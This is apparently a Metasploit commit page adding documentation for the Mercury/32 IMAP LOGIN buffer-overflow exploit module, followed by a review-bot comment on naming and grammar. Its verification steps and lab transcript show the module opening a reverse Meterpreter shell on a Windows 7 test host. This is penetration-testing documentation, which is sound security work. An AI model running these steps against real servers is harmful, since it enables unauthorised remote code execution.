Land #10853, Add universal targeting to Mercury/32 IMAP LOGIN exploit
1 parent e843da9, commit d6c4f5e
Showing 2 changed files with 83 additions and 39 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb. Sending an specially crafted IMAP login command allows remote code execution. | ||
|
||
## Vulnerable Application | ||
|
||
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org). | ||
|
||
* [Mercury/32 v4.01a](https://www.exploit-db.com/apps/8e0bf8aec964af66a5d440ef705d548f-m32-401a.exe) | ||
* [Mercury/32 v4.01b upgrade](http://web.archive.org/web/20070119125847if_/http://ftp.usm.maine.edu/pegasus/Mercury32/m32-401b.zip) | ||
|
||
This module has been tested successfully on: | ||
|
||
* Mercury/32 v4.01a on Windows XP SP3 (x86) | ||
* Mercury/32 v4.01a on Windows 7 SP1 (x86) | ||
* Mercury/32 v4.01a on Windows Server 2003 Standard Edition SP1 (x86) | ||
* Mercury/32 v4.01b on Windows 7 SP1 (x86) | ||
|
||
## Verification steps | ||
|
||
1. Install the vulnerable Mercury/32 application | ||
2. Start msfconsole | ||
3. Do: `use exploit/windows/imap/mercury_login` | ||
4. Do: `set RHOST IP` | ||
5. Do: `exploit` | ||
6. You should get a shell. | ||
|
||
## Scenarios | ||
|
||
### Mercury/32 v4.01a on Windows 7 SP1 x86 | ||
``` | ||
msf > use exploit/windows/imap/mercury_login1 | ||
msf exploit(windows/imap/mercury_login1) > set rhost 192.168.46.144 | ||
rhost => 192.168.46.144 | ||
msf exploit(windows/imap/mercury_login1) > exploit | ||
[*] Started reverse TCP handler on 192.168.46.1:4444 | ||
[*] 192.168.46.144:143 - Sending payload (8931 bytes) ... | ||
[*] Sending stage (179779 bytes) to 192.168.46.144 | ||
[*] Meterpreter session 1 opened (192.168.46.1:4444 -> 192.168.46.144:49219) at 2018-10-27 20:43:14 +0200 | ||
meterpreter > | ||
Computer : WIN-DQ8ELRSOJAO | ||
OS : Windows 7 (Build 7601, Service Pack 1). | ||
Architecture : x86 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 2 | ||
Meterpreter : x86/windows | ||
``` |
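Review bot: The Scenarios transcript loads `exploit/windows/imap/mercury_login1` (in the `use` line and in every prompt), while Verification step 3 documents `use exploit/windows/imap/mercury_login`; the transcript should use the documented module path so that a reader following the steps sees the same name. In the same transcript the `meterpreter >` prompt is followed directly by system details with no command shown, so add the command that produced that output. The opening sentence needs a grammar pass ("an stack based" and "an specially crafted" should read "a stack-based" and "a specially crafted"), and since it largely repeats the first paragraph under Vulnerable Application, one of the two could be dropped. The credit line "discovered by (mu-b at digit-labs.org)" reads better without the parentheses.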